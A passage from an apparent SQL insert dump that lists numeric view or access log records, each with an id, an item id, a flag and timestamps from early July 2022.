03:33:18'),(54196,1770,1,'2022-07-02','2022-07-02 03:44:21'),(54197,1770,1,'2022-07-02','2022-07-02 03:44:32'),(54198,4741,1,'2022-07-02','2022-07-02 03:56:26'),(54199,3083,1,'2022-07-02','2022-07-02 04:09:40'),(54200,4377,1,'2022-07-02','2022-07-02 04:25:26'),(54201,72,1,'2022-07-02','2022-07-02 06:15:31'),(54202,1778,1,'2022-07-02','2022-07-02 07:50:33'),(54203,4326,1,'2022-07-02','2022-07-02 08:39:20'),(54204,3079,1,'2022-07-02','2022-07-02 09:39:21'),(54205,3245,1,'2022-07-02','2022-07-02 11:00:11'),(54206,2617,1,'2022-07-02','2022-07-02 11:26:57'),(54207,4326,1,'2022-07-02','2022-07-02 12:45:15'),(54208,1724,1,'2022-07-02','2022-07-02 13:00:31'),(54209,1724,1,'2022-07-02','2022-07-02 13:01:20'),(54210,1724,1,'2022-07-02','2022-07-02 13:01:44'),(54211,1724,1,'2022-07-02','2022-07-02 13:02:01'),(54212,4694,1,'2022-07-02','2022-07-02 13:13:35'),(54213,1594,1,'2022-07-02','2022-07-02 14:57:14'),(54214,4412,1,'2022-07-02','2022-07-02 15:07:11'),(54215,4738,1,'2022-07-02','2022-07-02 15:10:22'),(54216,1588,1,'2022-07-02','2022-07-02 15:13:59'),(54217,4738,1,'2022-07-02','2022-07-02 15:19:15'),(54218,1588,1,'2022-07-02','2022-07-02 15:28:06'),(54219,2704,1,'2022-07-02','2022-07-02 15:48:31'),(54220,2704,1,'2022-07-02','2022-07-02 15:50:30'),(54221,3721,1,'2022-07-02','2022-07-02 16:44:44'),(54222,1610,1,'2022-07-02','2022-07-02 17:07:12'),(54223,1610,1,'2022-07-02','2022-07-02 17:15:38'),(54224,4326,1,'2022-07-02','2022-07-02 17:17:29'),(54225,1588,1,'2022-07-02','2022-07-02 17:17:53'),(54226,72,1,'2022-07-02','2022-07-02 17:30:25'),(54227,1594,1,'2022-07-02','2022-07-02 17:53:23'),(54228,4335,1,'2022-07-02','2022-07-02 17:53:27'),(54229,1594,1,'2022-07-02','2022-07-02 18:31:06'),(54230,4520,1,'2022-07-02','2022-07-02 18:48:23'),(54231,4668,1,'2022-07-02','2022-07-02 19:22:20'),(54232,2178,1,'2022-07-02','2022-07-02 19:35:28'),(54233,3731,1,'2022-07-02','2022-07-02 20:05:28'),(54234,3498,1,'2022-07-02','2022-07-02 20:35:28'),(54235,1596,1,'2022-07-02','2022-07-02 20:43:29'),(54236,1596,1,'2022-07-02','2022-07-02 20:43:30'),(54237,1602,1,'2022-07-02','2022-07-02 22:48:14'),(54238,4738,1,'2022-07-02','2022-07-02 22:49:17'),(54239,1602,1,'2022-07-02','2022-07-02 22:51:02'),(54240,1594,1,'2022-07-03','2022-07-03 00:25:04'),(54241,3438,1,'2022-07-03','2022-07-03 01:41:27'),(54242,3482,1,'2022-07-03','2022-07-03 01:41:28'),(54243,3430,1,'2022-07-03','2022-07-03 01:41:30'),(54244,2956,1,'2022-07-03','2022-07-03 01:41:31'),(54245,3742,1,'2022-07-03','2022-07-03 01:41:32'),(54246,3498,1,'2022-07-03','2022-07-03 01:41:33'),(54247,4335,1,'2022-07-03','2022-07-03 01:53:20'),(54248,4741,1,'2022-07-03','2022-07-03 03:06:07'),(54249,4408,1,'2022-07-03','2022-07-03 04:36:16'),(54250,72,1,'2022-07-03','2022-07-03 05:32:11'),(54251,4529,1,'2022-07-03','2022-07-03 07:08:25'),(54252,72,1,'2022-07-03','2022-07-03 07:08:31'),(54253,3090,1,'2022-07-03','2022-07-03 07:52:37'),(54254,1582,1,'2022-07-03','2022-07-03 08:08:24'),(54255,3030,1,'2022-07-03','2022-07-03 08:16:45'),(54256,1582,1,'2022-07-03','2022-07-03 08:23:01'),(54257,3479,1,'2022-07-03','2022-07-03 08:37:36'),(54258,1695,1,'2022-07-03','2022-07-03 08:40:25'),(54259,2704,1,'2022-07-03','2022-07-03 10:29:47'),(54260,2704,1,'2022-07-03','2022-07-03 10:48:45'),(54261,2813,1,'2022-07-03','2022-07-03 10:51:35'),(54262,4420,1,'2022-07-03','2022-07-03 11:33:45'),(54263,1608,1,'2022-07-03','2022-07-03 12:02:05'),(54264,3253,1,'2022-07-03','2022-07-03 12:21:34'),(54265,72,1,'2022-07-03','2022-07-03 13:32:30'),(54266,2154,1,'2022-07-03','2022-07-03 13:47:24'),(54267,4408,1,'2022-07-03','2022-07-03 15:44:25'),(54268,2457,1,'2022-07-03','2022-07-03 16:07:40'),(54269,4703,1,'2022-07-03','2022-07-03 17:01:14'),(54270,72,1,'2022-07-03','2022-07-03 17:14:27'),(54271,3438,1,'2022-07-03','2022-07-03 17:55:02'),(54272,1701,1,'2022-07-03','2022-07-03 18:17:03'),(54273,1608,1,'2022-07-03','2022-07-03 18:18:27'),(54274,1701,1,'2022-07-03','2022-07-03 18:18:49'),(54275,1701,1,'2022-07-03','2022-07-03 18:30:10'),(54276,1701,1,'2022-07-03','2022-07-03 18:30:54'),(54277,4391,1,'2022-07-03','2022-07-03 19:41:07'),(54278,68,1,'2022-07-03','2022-07-03 21:47:28'),(54279,1608,1,'2022-07-03','2022-07-03 22:43:40'),(54280,1544,1,'2022-07-03','2022-07-03 23:10:04'),(54281,3072,1,'2022-07-03','2022-07-03 23:17:52'),(54282,72,1,'2022-07-04','2022-07-04 00:08:13'),(54283,1588,1,'2022-07-04','2022-07-04 03:02:50'),(54284,4391,1,'2022-07-04','2022-07-04 03:34:34'),(54285,1602,1,'2022-07-04','2022-07-04 03:36:46'),(54286,1608,1,'2022-07-04','2022-07-04 03:51:42'),(54287,4703,1,'2022-07-04','2022-07-04 04:13:34'),(54288,1600,1,'2022-07-04','2022-07-04 04:51:38'),(54289,4416,1,'2022-07-04','2022-07-04 05:20:29'),(54290,1602,1,'2022-07-04','2022-07-04 05:36:35'),(54291,4387,1,'2022-07-04','2022-07-04 06:21:51'),(54292,91,1,'2022-07-04','2022-07-04 06:40:38'),(54293,2309,1,'2022-07-04','2022-07-04 07:25:04'),(54294,3287,1,'2022-07-04','2022-07-04 07:28:09'),(54295,68,1,'2022-07-04','2022-07-04 07:44:30'),(54296,1600,1,'2022-07-04','2022-07-04 09:25:08'),(54297,2769,1,'2022-07-04','2022-07-04 09:44:02'),(54298,4436,1,'2022-07-04','2022-07-04 10:15:00'),(54299,4436,1,'2022-07-04','2022-07-04 10:17:26'),(54300,1588,1,'2022-07-04','2022-07-04 11:20:07'),(54301,1766,1,'2022-07-04','2022-07-04 11:22:21'),(54302,72,1,'2022-07-04','2022-07-04 11:37:41'),(54303,1594,1,'2022-07-04','2022-07-04 11:38:31'),(54304,1594,1,'2022-07-04','2022-07-04 11:38:36'),(54305,1588,1,'2022-07-04','2022-07-04 12:02:55'),(54306,3727,1,'2022-07-04','2022-07-04 12:04:37'),(54307,1608,1,'2022-07-04','2022-07-04 12:32:26'),(54308,108,1,'2022-07-04','2022-07-04 12:32:30'),(54309,1600,1,'2022-07-04','2022-07-04 12:37:24'),(54310,4674,1,'2022-07-04','2022-07-04 12:47:01'),(54311,3127,1,'2022-07-04','2022-07-04 13:04:23'),(54312,1608,1,'2022-07-04','2022-07-04 13:17:25'),(54313,3704,1,'2022-07-04','2022-07-04 13:20:10'),(54314,4412,1,'2022-07-04','2022-07-04 13:34:40'),(54315,1594,1,'2022-07-04','2022-07-04 13:40:41'),(54316,4457,1,'2022-07-04','2022-07-04 13:48:38'),(54317,3271,1,'2022-07-04','2022-07-04 14:02:26'),(54318,80,1,'2022-07-04','2022-07-04 14:20:14'),(54319,0,1,'2022-07-04','2022-07-04 15:22:44'),(54320,2252,1,'2022-07-04','2022-07-04 15:53:21'),(54321,2252,1,'2022-07-04','2022-07-04 15:53:34'),(54322,2252,1,'2022-07-04','2022-07-04 15:53:38'),(54323,80,1,'2022-07-04','2022-07-04 16:18:02'),(54324,4738,1,'2022-07-04','2022-07-04 16:43:00'),(54325,2165,1,'2022-07-04','2022-07-04 16:49:44'),(54326,68,1,'2022-07-04','2022-07-04 16:49:47'),(54327,4738,1,'2022-07-04','2022-07-04 17:32:30'),(54328,3072,1,'2022-07-04','2022-07-04 17:34:31'),(54329,4738,1,'2022-07-04','2022-07-04 17:36:33'),(54330,4738,1,'2022-07-04','2022-07-04 18:12:46'),(54331,1872,1,'2022-07-04','2022-07-04 19:25:50'),(54332,72,1,'2022-07-04','2022-07-04 19:36:16'),(54333,1588,1,'2022-07-04','2022-07-04 19:57:53'),(54334,1877,1,'2022-07-04','2022-07-04 20:10:56'),(54335,4529,1,'2022-07-04','2022-07-04 20:30:21'),(54336,108,1,'2022-07-04','2022-07-04 21:37:59'),(54337,4457,1,'2022-07-04','2022-07-04 21:56:54'),(54338,80,1,'2022-07-04','2022-07-04 23:44:11'),(54339,2809,1,'2022-07-05','2022-07-05 00:29:03'),(54340,89,1,'2022-07-05','2022-07-05 00:51:39'),(54341,469,1,'2022-07-05','2022-07-05 01:14:07'),(54342,4416,1,'2022-07-05','2022-07-05 02:18:03'),(54343,4238,1,'2022-07-05','2022-07-05 02:42:52'),(54344,87,1,'2022-07-05','2022-07-05 03:50:05'),(54345,80,1,'2022-07-05','2022-07-05 03:50:43'),(54346,1614,1,'2022-07-05','2022-07-05 04:22:46'),(54347,4759,1,'2022-07-05','2022-07-05 04:42:56'),(54348,72,1,'2022-07-05','2022-07-05 04:59:46'),(54349,4400,1,'2022-07-05','2022-07-05 05:18:36'),(54350,1588,1,'2022-07-05','2022-07-05 05:46:47'),(54351,1586,1,'2022-07-05','2022-07-05 06:07:43'),(54352,1588,1,'2022-07-05','2022-07-05 06:22:56'),(54353,3482,1,'2022-07-05','2022-07-05 06:33:48'),(54354,1592,1,'2022-07-05','2022-07-05 06:41:55'),(54355,4738,1,'2022-07-05','2022-07-05 06:59:22'),(54356,4738,1,'2022-07-05','2022-07-05 07:00:00'),(54357,1598,1,'2022-07-05','2022-07-05 07:11:50'),(54358,1726,1,'2022-07-05','2022-07-05 07:26:00'),(54359,1726,1,'2022-07-05','2022-07-05 07:27:07'),(54360,2911,1,'2022-07-05','2022-07-05 07:42:43'),(54361,80,1,'2022-07-05','2022-07-05 07:42:57'),(54362,1544,1,'2022-07-05','2022-07-05 07:45:59'),(54363,1586,1,'2022-07-05','2022-07-05 08:28:07'),(54364,2609,1,'2022-07-05','2022-07-05 08:44:56'),(54365,4457,1,'2022-07-05','2022-07-05 08:46:06'),(54366,467,1,'2022-07-05','2022-07-05 09:15:56'),(54367,4424,1,'2022-07-05','2022-07-05 10:49:44'),(54368,4587,1,'2022-07-05','2022-07-05 11:19:27'),(54369,4238,1,'2022-07-05','2022-07-05 11:27:52'),(54370,4738,1,'2022-07-05','2022-07-05 12:48:26'),(54371,4738,1,'2022-07-05','2022-07-05 12:49:34'),(54372,2904,1,'2022-07-05','2022-07-05 12:50:53'),(54373,4738,1,'2022-07-05','2022-07-05 12:51:40'),(54374,1588,1,'2022-07-05','2022-07-05 13:29:59'),(54375,1586,1,'2022-07-05','2022-07-05 13:32:18'),(54376,72,1,'2022-07-05','2022-07-05 13:36:57'),(54377,4457,1,'2022-07-05','2022-07-05 13:43:50'),(54378,1592,1,'2022-07-05','2022-07-05 14:27:15'),(54379,1588,1,'2022-07-05','2022-07-05 14:44:59'),(54380,1598,1,'2022-07-05','2022-07-05 15:30:39'),(54381,3072,1,'2022-07-05','2022-07-05 15:43:56'),(54382,80,1,'2022-07-05','2022-07-05 16:16:06'),(54383,4694,1,'2022-07-05','2022-07-05 16:30:12'),(54384,3479,1,'2022-07-05','2022-07-05 18:05:14'),(54385,3691,1,'2022-07-05','2022-07-05 18:18:28'),(54386,1606,1,'2022-07-05','2022-07-05 18:44:39'),(54387,1602,1,'2022-07-05','2022-07-05 18:48:59'),(54388,1544,1,'2022-07-05','2022-07-05 19:01:03'),(54389,4529,1,'2022-07-05','2022-07-05 19:17:57'),(54390,335,1,'2022-07-05','2022-07-05 19:53:30'),(54391,4428,1,'2022-07-05','2022-07-05 20:31:13'),(54392,467,1,'2022-07-05','2022-07-05 20:31:15'),(54393,4703,1,'2022-07-05','2022-07-05 21:05:47'),(54394,4660,1,'2022-07-05','2022-07-05 21:19:11'),(54395,2309,1,'2022-07-05','2022-07-05 21:30:50'),(54396,3307,1,'2022-07-05','2022-07-05 21:36:34'),(54397,1588,1,'2022-07-05','2022-07-05 21:52:26'),(54398,4238,1,'2022-07-05','2022-07-05 22:27:51'),(54399,3498,1,'2022-07-05','2022-07-05 22:43:05'),(54400,1734,1,'2022-07-05','2022-07-05 23:00:05'),(54401,3249,1,'2022-07-05','2022-07-05 23:16:12'),(54402,72,1,'2022-07-05','2022-07-05 23:53:28'),(54403,4238,1,'2022-07-05','2022-07-05 23:58:49'),(54404,1728,1,'2022-07-06','2022-07-06 00:10:32'),(54405,3438,1,'2022-07-06','2022-07-06 02:15:19'),(54406,3534,1,'2022-07-06','2022-07-06 03:00:52'),(54407,1596,1,'2022-07-06','2022-07-06 03:13:29'),(54408,1596,1,'2022-07-06','2022-07-06 03:13:30'),(54409,1596,1,'2022-07-06','2022-07-06 03:16:03'),(54410,1544,1,'2022-07-06','2022-07-06 05:33:53'),(54411,1594,1,'2022-07-06','2022-07-06 06:02:37'),(54412,1594,1,'2022-07-06','2022-07-06 06:08:31'),(54413,467,1,'2022-07-06','2022-07-06 06:19:34'),(54414,1877,1,'2022-07-06','2022-07-06 06:28:44'),(54415,4520,1,'2022-07-06','2022-07-06 06:32:55'),(54416,1544,1,'2022-07-06','2022-07-06 07:04:13'),(54417,1586,1,'2022-07-06','2022-07-06 07:18:01'),(54418,72,1,'2022-07-06','2022-07-06 07:53:12'),(54419,1728,1,'2022-07-06','2022-07-06 09:00:22'),(54420,4738,1,'2022-07-06','2022-07-06 10:03:08'),(54421,76,1,'2022-07-06','2022-07-06 10:43:42'),(54422,1588,1,'2022-07-06','2022-07-06 11:08:57'),(54423,1582,1,'2022-07-06','2022-07-06 11:15:19'),(54424,3724,1,'2022-07-06','2022-07-06 12:27:21'),(54425,1728,1,'2022-07-06','2022-07-06 12:41:50'),(54426,1728,1,'2022-07-06','2022-07-06 12:42:00'),(54427,4323,1,'2022-07-06','2022-07-06 12:53:33'),(54428,4457,1,'2022-07-06','2022-07-06 13:20:42'),(54429,2309,1,'2022-07-06','2022-07-06 14:32:48'),(54430,4520,1,'2022-07-06','2022-07-06 14:34:24'),(54431,4412,1,'2022-07-06','2022-07-06 15:03:23'),(54432,4457,1,'2022-07-06','2022-07-06 15:31:52'),(54433,72,1,'2022-07-06','2022-07-06 15:52:55'),(54434,2148,1,'2022-07-06','2022-07-06 16:28:52'),(54435,2148,1,'2022-07-06','2022-07-06 16:29:04'),(54436,2148,1,'2022-07-06','2022-07-06 16:29:18'),(54437,1596,1,'2022-07-06','2022-07-06 16:53:25'),(54438,1728,1,'2022-07-06','2022-07-06 17:38:10'),(54439,468,1,'2022-07-06','2022-07-06 18:57:41'),(54440,1770,1,'2022-07-06','2022-07-06 21:18:16'),(54441,1770,1,'2022-07-06','2022-07-06 21:18:30'),(54442,91,1,'2022-07-06','2022-07-06 21:19:09'),(54443,4436,1,'2022-07-06','2022-07-06 21:35:00'),(54444,4436,1,'2022-07-06','2022-07-06 21:35:01'),(54445,91,1,'2022-07-06','2022-07-06 21:35:14'),(54446,4396,1,'2022-07-06','2022-07-06 21:35:56'),(54447,4396,1,'2022-07-06','2022-07-06 21:35:57'),(54448,91,1,'2022-07-06','2022-07-06 21:36:11'),(54449,4612,1,'2022-07-06','2022-07-06 21:36:46'),(54450,4612,1,'2022-07-06','2022-07-06 21:36:48'),(54451,91,1,'2022-07-06','2022-07-06 21:37:04'),(54452,4448,1,'2022-07-06','2022-07-06 21:37:29'),(54453,4448,1,'2022-07-06','2022-07-06 21:37:31'),(54454,91,1,'2022-07-06','2022-07-06 21:38:43'),(54455,4432,1,'2022-07-06','2022-07-06 21:39:27'),(54456,4432,1,'2022-07-06','2022-07-06 21:39:28'),(54457,91,1,'2022-07-06','2022-07-06 21:40:27'),(54458,3280,1,'2022-07-06','2022-07-06 21:42:42'),(54459,3280,1,'2022-07-06','2022-07-06 21:42:49'),(54460,3280,1,'2022-07-06','2022-07-06 21:42:56'),(54461,3280,1,'2022-07-06','2022-07-06 21:43:09'),(54462,91,1,'2022-07-06','2022-07-06 21:43:25'),(54463,3287,1,'2022-07-06','2022-07-06 21:44:18'),(54464,91,1,'2022-07-06','2022-07-06 21:44:54'),(54465,1766,1,'2022-07-06','2022-07-06 21:52:02'),(54466,91,1,'2022-07-06','2022-07-06 21:52:16'),(54467,4738,1,'2022-07-06','2022-07-06 22:46:22'),(54468,3764,1,'2022-07-06','2022-07-06 23:52:19'),(54469,3764,1,'2022-07-07','2022-07-07 00:37:31'),(54470,2297,1,'2022-07-07','2022-07-07 00:48:30'),(54471,2410,1,'2022-07-07','2022-07-07 01:59:38'),(54472,2309,1,'2022-07-07','2022-07-07 02:07:27'),(54473,72,1,'2022-07-07','2022-07-07 02:24:47'),(54474,4301,1,'2022-07-07','2022-07-07 02:35:17'),(54475,1596,1,'2022-07-07','2022-07-07 02:35:18'),(54476,1728,1,'2022-07-07','2022-07-07 02:37:29'),(54477,1602,1,'2022-07-07','2022-07-07 03:07:31'),(54478,80,1,'2022-07-07','2022-07-07 03:26:32'),(54479,80,1,'2022-07-07','2022-07-07 03:35:03'),(54480,91,1,'2022-07-07','2022-07-07 03:37:28'),(54481,4700,1,'2022-07-07','2022-07-07 03:48:29'),(54482,2410,1,'2022-07-07','2022-07-07 04:04:31'),(54483,2457,1,'2022-07-07','2022-07-07 04:11:05'),(54484,570,1,'2022-07-07','2022-07-07 05:24:26'),(54485,4529,1,'2022-07-07','2022-07-07 05:47:03'),(54486,1606,1,'2022-07-07','2022-07-07 06:46:08'),(54487,2617,1,'2022-07-07','2022-07-07 07:11:05'),(54488,4457,1,'2022-07-07','2022-07-07 08:17:29'),(54489,1544,1,'2022-07-07','2022-07-07 08:27:29'),(54490,2609,1,'2022-07-07','2022-07-07 08:41:07'),(54491,4703,1,'2022-07-07','2022-07-07 08:46:37'),(54492,4420,1,'2022-07-07','2022-07-07 08:52:24'),(54493,1596,1,'2022-07-07','2022-07-07 10:05:57'),(54494,4457,1,'2022-07-07','2022-07-07 10:18:06'),(54495,72,1,'2022-07-07','2022-07-07 10:27:57'),(54496,4694,1,'2022-07-07','2022-07-07 11:10:35'),(54497,1602,1,'2022-07-07','2022-07-07 12:16:20'),(54498,3781,1,'2022-07-07','2022-07-07 12:41:21'),(54499,2457,1,'2022-07-07','2022-07-07 13:11:03'),(54500,1596,1,'2022-07-07','2022-07-07 13:16:25'),(54501,1602,1,'2022-07-07','2022-07-07 13:20:26'),(54502,1602,1,'2022-07-07','2022-07-07 13:29:31'),(54503,4424,1,'2022-07-07','2022-07-07 13:39:15'),(54504,1745,1,'2022-07-07','2022-07-07 13:47:00'),(54505,1745,1,'2022-07-07','2022-07-07 13:49:03'),(54506,4700,1,'2022-07-07','2022-07-07 14:23:59'),(54507,2309,1,'2022-07-07','2022-07-07 14:34:24'),(54508,2309,1,'2022-07-07','2022-07-07 14:35:08'),(54509,3307,1,'2022-07-07','2022-07-07 14:41:16'),(54510,488,1,'2022-07-07','2022-07-07 14:46:29'),(54511,1614,1,'2022-07-07','2022-07-07 15:13:16'),(54512,2309,1,'2022-07-07','2022-07-07 15:29:06'),(54513,1586,1,'2022-07-07','2022-07-07 15:40:54'),(54514,4750,1,'2022-07-07','2022-07-07 15:49:31'),(54515,4759,1,'2022-07-07','2022-07-07 16:04:48'),(54516,2309,1,'2022-07-07','2022-07-07 16:10:08'),(54517,1728,1,'2022-07-07','2022-07-07 16:20:31'),(54518,1728,1,'2022-07-07','2022-07-07 16:21:53'),(54519,1728,1,'2022-07-07','2022-07-07 16:22:34'),(54520,2904,1,'2022-07-07','2022-07-07 16:23:55'),(54521,2904,1,'2022-07-07','2022-07-07 16:24:53'),(54522,91,1,'2022-07-07','2022-07-07 16:25:30'),(54523,1728,1,'2022-07-07','2022-07-07 16:28:09'),(54524,2617,1,'2022-07-07','2022-07-07 16:48:43'),(54525,2309,1,'2022-07-07','2022-07-07 16:53:49'),(54526,2309,1,'2022-07-07','2022-07-07 17:06:37'),(54527,1586,1,'2022-07-07','2022-07-07 17:11:35'),(54528,1598,1,'2022-07-07','2022-07-07 18:15:15'),(54529,72,1,'2022-07-07','2022-07-07 18:30:11'),(54530,1602,1,'2022-07-07','2022-07-07 18:37:35'),(54531,4457,1,'2022-07-07','2022-07-07 19:34:13'),(54532,1711,1,'2022-07-07','2022-07-07 19:43:27'),(54533,2704,1,'2022-07-07','2022-07-07 19:52:54'),(54534,4323,1,'2022-07-07','2022-07-07 19:59:29'),(54535,1600,1,'2022-07-07','2022-07-07 20:09:10'),(54536,467,1,'2022-07-07','2022-07-07 20:11:51'),(54537,2956,1,'2022-07-07','2022-07-07 20:13:21'),(54538,4612,1,'2022-07-07','2022-07-07 20:32:19'),(54539,3097,1,'2022-07-07','2022-07-07 21:12:02'),(54540,1586,1,'2022-07-07','2022-07-07 21:29:45'),(54541,1600,1,'2022-07-07','2022-07-07 21:38:41'),(54542,1718,1,'2022-07-07','2022-07-07 21:52:57'),(54543,3735,1,'2022-07-07','2022-07-07 22:19:26'),(54544,570,1,'2022-07-07','2022-07-07 22:57:52'),(54545,1586,1,'2022-07-07','2022-07-07 23:13:21'),(54546,3045,1,'2022-07-07','2022-07-07 23:49:04'),(54547,4654,1,'2022-07-07','2022-07-07 23:53:08'),(54548,3313,1,'2022-07-08','2022-07-08 00:11:32'),(54549,1586,1,'2022-07-08','2022-07-08 00:14:03'),(54550,1586,1,'2022-07-08','2022-07-08 00:14:08'),(54551,1749,1,'2022-07-08','2022-07-08 00:27:53'),(54552,1544,1,'2022-07-08','2022-07-08 01:09:35'),(54553,1598,1,'2022-07-08','2022-07-08 02:06:03'),(54554,2617,1,'2022-07-08','2022-07-08 02:51:03'),(54555,72,1,'2022-07-08','2022-07-08 03:31:19'),(54556,3764,1,'2022-07-08','2022-07-08 03:52:42'),(54557,1600,1,'2022-07-08','2022-07-08 04:29:04'),(54558,3251,1,'2022-07-08','2022-07-08 04:53:11'),(54559,2609,1,'2022-07-08','2022-07-08 05:28:47'),(54560,2609,1,'2022-07-08','2022-07-08 05:28:58'),(54561,4750,1,'2022-07-08','2022-07-08 05:51:34'),(54562,3285,1,'2022-07-08','2022-07-08 06:36:10'),(54563,1544,1,'2022-07-08','2022-07-08 08:59:09'),(54564,1596,1,'2022-07-08','2022-07-08 09:33:00'),(54565,1604,1,'2022-07-08','2022-07-08 10:13:32'),(54566,80,1,'2022-07-08','2022-07-08 10:14:02'),(54567,1604,1,'2022-07-08','2022-07-08 10:14:17'),(54568,1594,1,'2022-07-08','2022-07-08 11:17:12'),(54569,72,1,'2022-07-08','2022-07-08 11:31:24'),(54570,2309,1,'2022-07-08','2022-07-08 11:32:10'),(54571,1600,1,'2022-07-08','2022-07-08 12:16:44'),(54572,1598,1,'2022-07-08','2022-07-08 12:25:23'),(54573,3534,1,'2022-07-08','2022-07-08 12:37:26'),(54574,87,1,'2022-07-08','2022-07-08 14:24:21'),(54575,1600,1,'2022-07-08','2022-07-08 14:24:49'),(54576,80,1,'2022-07-08','2022-07-08 14:38:38'),(54577,1600,1,'2022-07-08','2022-07-08 14:40:37'),(54578,1600,1,'2022-07-08','2022-07-08 14:40:53'),(54579,1602,1,'2022-07-08','2022-07-08 14:42:21'),(54580,1600,1,'2022-07-08','2022-07-08 15:13:10'),(54581,3066,1,'2022-07-08','2022-07-08 15:29:05'),(54582,4776,1,'2022-07-08','2022-07-08 15:39:03'),(54583,4776,1,'2022-07-08','2022-07-08 15:39:05'),(54584,3749,1,'2022-07-08','2022-07-08 16:24:21'),(54585,1582,1,'2022-07-08','2022-07-08 16:24:34'),(54586,3104,1,'2022-07-08','2022-07-08 16:30:00'),(54587,3280,1,'2022-07-08','2022-07-08 16:30:31'),(54588,3710,1,'2022-07-08','2022-07-08 16:34:07'),(54589,1608,1,'2022-07-08','2022-07-08 16:36:30'),(54590,3742,1,'2022-07-08','2022-07-08 16:40:09'),(54591,3109,1,'2022-07-08','2022-07-08 16:43:32'),(54592,1586,1,'2022-07-08','2022-07-08 16:59:16'),(54593,1612,1,'2022-07-08','2022-07-08 16:59:51'),(54594,72,1,'2022-07-08','2022-07-08 19:31:20'),(54595,4738,1,'2022-07-08','2022-07-08 19:42:14'),(54596,4738,1,'2022-07-08','2022-07-08 19:44:10'),(54597,4738,1,'2022-07-08','2022-07-08 19:44:14'),(54598,2248,1,'2022-07-08','2022-07-08 20:19:06'),(54599,1586,1,'2022-07-08','2022-07-08 20:46:45'),(54600,1586,1,'2022-07-08','2022-07-08 20:48:40'),(54601,468,1,'2022-07-08','2022-07-08 22:30:59'),(54602,87,1,'2022-07-08','2022-07-08 23:47:44'),(54603,1544,1,'2022-07-09','2022-07-09 00:26:04'),(54604,1602,1,'2022-07-09','2022-07-09 00:46:20'),(54605,3764,1,'2022-07-09','2022-07-09 00:56:08'),(54606,2309,1,'2022-07-09','2022-07-09 01:05:56'),(54607,1602,1,'2022-07-09','2022-07-09 01:18:54'),(54608,2309,1,'2022-07-09','2022-07-09 01:25:30'),(54609,4520,1,'2022-07-09','2022-07-09 02:20:24'),(54610,472,1,'2022-07-09','2022-07-09 02:52:04'),(54611,3124,1,'2022-07-09','2022-07-09 03:23:43'),(54612,4436,1,'2022-07-09','2022-07-09 03:39:32'),(54613,3307,1,'2022-07-09','2022-07-09 03:55:23'),(54614,3092,1,'2022-07-09','2022-07-09 04:11:15'),(54615,1728,1,'2022-07-09','2022-07-09 05:11:06'),(54616,1728,1,'2022-07-09','2022-07-09 05:26:20'),(54617,1728,1,'2022-07-09','2022-07-09 05:27:13'),(54618,72,1,'2022-07-09','2022-07-09 06:46:16'),(54619,3691,1,'2022-07-09','2022-07-09 07:11:15'),(54620,1722,1,'2022-07-09','2022-07-09 08:00:19'),(54621,1722,1,'2022-07-09','2022-07-09 08:00:41'),(54622,1722,1,'2022-07-09','2022-07-09 08:01:05'),(54623,4768,1,'2022-07-09','2022-07-09 08:28:05'),(54624,4762,1,'2022-07-09','2022-07-09 08:28:39'),(54625,4753,1,'2022-07-09','2022-07-09 08:28:59'),(54626,4750,1,'2022-07-09','2022-07-09 08:29:06'),(54627,472,1,'2022-07-09','2022-07-09 11:31:22'),(54628,2148,1,'2022-07-09','2022-07-09 11:43:20'),(54629,2148,1,'2022-07-09','2022-07-09 11:44:16'),(54630,2148,1,'2022-07-09','2022-07-09 11:46:17'),(54631,87,1,'2022-07-09','2022-07-09 11:46:40'),(54632,485,1,'2022-07-09','2022-07-09 11:50:03'),(54633,1602,1,'2022-07-09','2022-07-09 12:04:20'),(54634,1602,1,'2022-07-09','2022-07-09 12:13:23'),(54635,72,1,'2022-07-09','2022-07-09 14:45:44'),(54636,4694,1,'2022-07-09','2022-07-09 15:46:27'),(54637,481,1,'2022-07-09','2022-07-09 17:19:49'),(54638,2457,1,'2022-07-09','2022-07-09 17:21:10'),(54639,485,1,'2022-07-09','2022-07-09 17:56:51'),(54640,4668,1,'2022-07-09','2022-07-09 18:07:34'),(54641,4668,1,'2022-07-09','2022-07-09 18:37:17'),(54642,80,1,'2022-07-09','2022-07-09 18:46:09'),(54643,4674,1,'2022-07-09','2022-07-09 18:51:23'),(54644,1728,1,'2022-07-09','2022-07-09 20:06:56'),(54645,1728,1,'2022-07-09','2022-07-09 20:09:19'),(54646,1728,1,'2022-07-09','2022-07-09 20:15:40'),(54647,4685,1,'2022-07-09','2022-07-09 20:16:52'),(54648,1596,1,'2022-07-09','2022-07-09 21:55:53'),(54649,4688,1,'2022-07-09','2022-07-09 22:30:13'),(54650,4681,1,'2022-07-09','2022-07-09 23:06:36'),(54651,1602,1,'2022-07-09','2022-07-09 23:07:41'),(54652,469,1,'2022-07-09','2022-07-09 23:08:26'),(54653,4691,1,'2022-07-09','2022-07-09 23:27:01'),(54654,469,1,'2022-07-09','2022-07-09 23:37:08'),(54655,4677,1,'2022-07-09','2022-07-09 23:49:45'),(54656,1766,1,'2022-07-10','2022-07-10 00:38:10'),(54657,4697,1,'2022-07-10','2022-07-10 00:45:01'),(54658,4424,1,'2022-07-10','2022-07-10 00:51:48'),(54659,4709,1,'2022-07-10','2022-07-10 00:53:08'),(54660,4706,1,'2022-07-10','2022-07-10 01:02:53'),(54661,4703,1,'2022-07-10','2022-07-10 01:10:07'),(54662,4694,1,'2022-07-10','2022-07-10 01:19:21'),(54663,4700,1,'2022-07-10','2022-07-10 01:27:08'),(54664,1596,1,'2022-07-10','2022-07-10 01:36:26'),(54665,4712,1,'2022-07-10','2022-07-10 01:43:18'),(54666,4566,1,'2022-07-10','2022-07-10 02:02:18'),(54667,72,1,'2022-07-10','2022-07-10 02:12:55'),(54668,3109,1,'2022-07-10','2022-07-10 07:07:34'),(54669,1602,1,'2022-07-10','2022-07-10 08:21:25'),(54670,1606,1,'2022-07-10','2022-07-10 09:08:40'),(54671,1606,1,'2022-07-10','2022-07-10 09:10:30'),(54672,72,1,'2022-07-10','2022-07-10 10:12:47'),(54673,1582,1,'2022-07-10','2022-07-10 10:18:30'),(54674,4738,1,'2022-07-10','2022-07-10 10:43:33'),(54675,469,1,'2022-07-10','2022-07-10 10:48:36'),(54676,3781,1,'2022-07-10','2022-07-10 13:56:37'),(54677,2911,1,'2022-07-10','2022-07-10 15:49:21'),(54678,2775,1,'2022-07-10','2022-07-10 15:49:51'),(54679,4412,1,'2022-07-10','2022-07-10 17:12:16'),(54680,1606,1,'2022-07-10','2022-07-10 17:47:27'),(54681,4412,1,'2022-07-10','2022-07-10 